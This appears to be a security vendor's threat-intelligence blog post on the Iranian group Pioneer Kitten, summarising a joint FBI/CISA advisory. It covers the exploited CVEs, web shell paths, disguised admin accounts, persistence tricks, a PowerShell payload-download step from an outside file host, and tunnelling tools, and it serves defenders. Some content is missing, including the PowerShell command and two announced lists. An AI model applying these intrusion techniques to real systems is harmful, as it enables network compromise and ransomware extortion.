Pioneer Kitten: Iranian Threat Actors Facilitate Ransomware Attacks Against U.S. Organizations

On August 28th, 2024, the Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and the Department of Defense Cyber Crime Center (DC3) released a joint advisory warning organizations about the activities of an Iran-based cyber group known as Fox Kitten [1]. This group, also referred to as Pioneer Kitten, UNC757, Parisite, RUBIDIUM, and Lemon Sandstorm [2], has been exploiting organizations across various sectors in the United States, including education, finance, healthcare, and defense, as well as in Middle Eastern countries such as Israel, Azerbaijan, and the United Arab Emirates. The FBI assesses that these actors aim to develop network access, which is then used in collaboration with ransomware affiliates like BlackCat and NoEscape to deploy ransomware.

In this blog post, we will discuss the tools and techniques used by Pioneer Kitten and how organizations can protect themselves against this threat.

Simulate State-Sponsored Cyber Threats with 14-Day Free Trial of Picus Platform

Pioneer Kitten: The Iranian State-sponsored Cyber Actors

Pioneer Kitten, an Iranian state-sponsored cyber group active since 2017, has rebranded itself as "xplfinder" in 2024, following its previous name "Br0k3r," which reflected their practice of selling access to compromised networks. The group has continued its activities into August 2024, targeting organizations primarily in the U.S. and Middle Eastern countries like Israel, Azerbaijan, and the United Arab Emirates. Their primary goal is to gain and sustain unauthorized access to victim networks, which they then exploit for a range of malicious purposes.

Pioneer Kitten leverages this access to collaborate with ransomware affiliates, including NoEscape, Ransomhouse, and ALPHV (aka BlackCat), playing a crucial role in facilitating encryption operations and extorting victims. However, the group's involvement goes beyond only providing access; they actively participate in locking down networks and devising strategies to maximize extortion efforts.

Tactics, Techniques, and Procedures (TTPs) used by Pioneer Kitten

The following is an overview of the TTPs observed in Pioneer Kitten's attack campaigns, showcasing their systematic approach to compromising and exploiting victim networks.

Reconnaissance

T1596 - Search Open Technical Databases

Pioneer Kitten uses the Shodan[.]io search engine to identify IP addresses hosting network devices with known vulnerabilities (CVE refers to specific security flaws). By scanning for these weaknesses, the group can locate and target publicly accessible devices that provide easy entry points into the network—essentially targeting "low-hanging fruits" that are easier to exploit.

Initial Access

T1190 - Exploit Public-Facing Application

Pioneer Kitten capitalizes on these identified vulnerabilities in public-facing networking devices to establish initial access to target networks. 

Notable vulnerabilities exploited by the group include:

• Citrix Netscaler: CVE-2019-19781, CVE-2023-3519
• F5 BIG-IP: CVE-2022-1388
• Pulse Secure/Ivanti VPNs: CVE-2024-21887
• PanOS firewalls: CVE-2024-3400
• Check Point Security Gateways: CVE-2024-24919

Persistence

T1505.003 - Web Shell

After exploiting vulnerable devices, Pioneer Kitten deploys web shells to maintain persistence and capture login credentials. Specific techniques include:

• Capturing login credentials on compromised Netscaler devices and appending them to a file named netscaler.1 located in the same directory as the web shell.

• Creating the directory /var/vpn/themes/imgs/ on Citrix Netscaler devices and deploying malicious files, such as:

  • netscaler.1
  • netscaler.php
  • ctxHeaderLogon.php

• Deploying additional web shells on compromised Netscaler devices right after system owners patch the exploited vulnerabilities. By placing new web shells, attackers create a contingency plan. Even if the original vulnerability is fixed, they have pre-established alternative entry points, reducing the likelihood that they will be completely locked out of the system. 

The additional web shells were observed as with the following file paths.

• • /netscaler/logon/LogonPoint/uiareas/ui_style.php
  • /netscaler/logon/sanpdebug.php

T1136.001 - Create Account (Local Account)

The group creates local accounts on victim networks to maintain access. Observed account names include:

• "sqladmin$"
• "adfsservice"
• "IIS_Admin"
• "iis-admin"
• "John McCain"

By creating accounts that mimic legitimate system accounts (e.g., "IIS_Admin," "sqladmin$"), attackers ensure they have ongoing access to the system even if their initial entry method is detected and blocked. These accounts are used for lateral movement within the network, execution of commands, and further exploitation while blending in with regular user activity.

T1098 - Account Manipulation

The attackers ask for exceptions to zero-trust and security policies, allowing them to install and run their malicious tools without being blocked or detected within the victim's network.

T1053 - Scheduled Task/Job

Pioneer Kitten uses scheduled tasks to maintain persistence by loading malware through installed backdoors. 

For example:

• A scheduled task named SpaceAgentTaskMgrSHR in the Windows/Spaceport/ task folder uses a DLL side-loading technique to load a payload from version.dll.

• They also place a malicious backdoor file, version.dll, in the C:\Windows\ADFS\ directory.

T1505 - Server Software Component

Pioneer Kitten also creates a daily Windows service task that is designed to run automatically each day. They give these tasks random eight-character names to make them less suspicious and harder to detect. 

The purpose of these tasks is to execute a DLL file with a matching name in the C:\Windows\system32\drivers\directory. For example, if the service is named "test," it will try to load and run a file named test.sys in that directory. This technique helps the attackers maintain persistence and evade detection, as the service and DLL file blend in with legitimate system files.

Privilege Escalation

T1078.003 - Valid Accounts: Local Accounts

Pioneer Kitten repurposes compromised credentials obtained from exploited networking devices (e.g., Citrix Netscaler) to log into other applications such as Citrix XenDesktop.

This means that the group uses login credentials they have stolen from compromised networking devices, like Citrix Netscaler, to access other systems and applications within the same network. For instance, once they have the credentials, they can log into Citrix XenDesktop, which is a virtual desktop infrastructure (VDI) platform. By doing so, they can move laterally across the network, accessing different parts of the system to further their attack.

T1078.002 - Valid Accounts: Domain Accounts

The attackers reuse stolen admin credentials from network administrators to gain access to domain controllers and other key systems within the victim's network. This level of access is highly dangerous, as it allows them to control vital network functions, escalate privileges, spread malware, and exfiltrate sensitive data, putting the entire network at serious risk.

Defense Evasion

T1562.001 - Impair Defenses: Disable or Modify Tools

The group uses administrator credentials to disable antivirus and security software to neutralize the defenses that could detect, block, or remove their malicious tools (a.k.a hunter-killer malware) and activities. By disabling these security controls, they ensure that their malware can run uninterrupted, maintaining their foothold on the compromised systems without being detected or hindered by protective measures

Credential Access

T1056 - Input Capture

Pioneer Kitten captures login credentials using web shells and other malicious tools deployed on compromised devices.

Execution

T1059.001 - Command and Scripting Interpreter

Pioneer Kitten leverages stolen administrator accounts to start remote desktop sessions and run commands on the compromised system. They often use tools like Microsoft Windows PowerShell to do this:

The explanation of this PowerShell command is as follows:

• Invoke-WebRequest: Makes an HTTP/S request to a specified URL.

• -Uri http://files.catbox.moe/: The command is reaching out to a site called "catbox.moe" to download a file.

• -OutFile C:\Users\Public\malware.exe: The file is saved in the C:\Users\Public\ directory with the name "malware.exe" (not the real name of the malware).

They also enable servers to use Windows PowerShell Web Access to execute their commands remotely.

Discovery

T1012 - Query Registry

Pioneer Kitten export registry hives and network firewall configurations to gather detailed information about system settings, security policies, and network architecture. 

T1482 - Domain Trust Discovery

Additionally, the group performs domain trust discovery by exfiltrating account usernames from the domain controller and accessing configuration files and logs. This allows them to map out domain relationships and identify critical assets, which they can leverage for further exploitation and lateral movement within the network.

Command and Control

T1219 - Remote Access Software

Pioneer Kitten installs remote access software like AnyDesk and Meshcentral on compromised systems to maintain control. 

From an attacker's perspective, installing remote access software on compromised systems ensures that they can maintain a consistent and reliable foothold in the network. These tools allow the attacker to remotely access and control the system at any time, bypassing the need to re-exploit vulnerabilities or re-establish access if their initial entry point is detected and removed. By using widely recognized remote access tools, attackers also blend in with legitimate administrative activities, making their presence harder to detect

T1572 - Protocol Tunneling

Pioneer Kitten leverages tools like Ligolo and NGROK to establish encrypted tunnels that facilitate stealthy communication with their command and control servers.

• Ligolo sets up a reverse tunnel from the compromised system back to the attacker's machine. It encapsulates network traffic within an encrypted tunnel, allowing the attacker to access internal network resources remotely. By routing traffic through this tunnel, the attacker can operate as if they were on the local network, evading detection by security measures that focus on direct outbound connections.

• NGROK creates a secure tunnel by linking the compromised system to a publicly accessible subdomain. This tunnel forwards traffic from NGROK's external server to the local system, disguising it as legitimate HTTPS traffic. This method helps the attacker bypass firewalls and intrusion detection systems, which may overlook such traffic as routine.

Exfiltration and Impact

T1657 - Exfiltration Over Web Service

After infiltrating victim networks, Pioneer Kitten collaborates with ransomware affiliates, including NoEscape, RansomHouse, and ALPHV (aka BlackCat). They provide these affiliates with access to the compromised networks in exchange for a share of the ransom payments. The actors also engage in data theft, likely supporting the goals of the Iranian government or other financially motivated objectives.

How Picus Helps Simulate Pioneer Kitten Attacks?

We also strongly suggest simulating Pioneer Kitten attacks to test the effectiveness of your security controls against sophisticated cyber attacks using the Picus Security Validation Platform. You can also test your defenses against hundreds of other state-sponsored threat actors, such as APT40, Lazarus, and Volt Typhoon, within minutes with a 14-day free trial of the Picus Platform.

Picus Threat Library includes the following threats for Pioneer Kitten aka Fox Kitten and its affiliates:

Picus also provides actionable mitigation content. Picus Mitigation Library includes prevention signatures to address malware and vulnerabilities exploited by the Pioneer Kitten group in preventive security controls. Currently, Picus Labs validated the following signatures for Pioneer Kitten Group:

Start simulating emerging threats today and get actionable mitigation insights with a  14-day free trial of the Picus Security Validation Platform.

References

[1] "Iran-based Cyber Actors Enabling Ransomware Attacks on US Organizations," Cybersecurity and Infrastructure Security Agency CISA. [Online]. Available: https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-241a

[2] F. Fkie, "Fox Kitten (Threat Actor)." Available: https://malpedia.caad.fkie.fraunhofer.de/actor/fox_kitten. [Accessed: Aug. 28, 2024]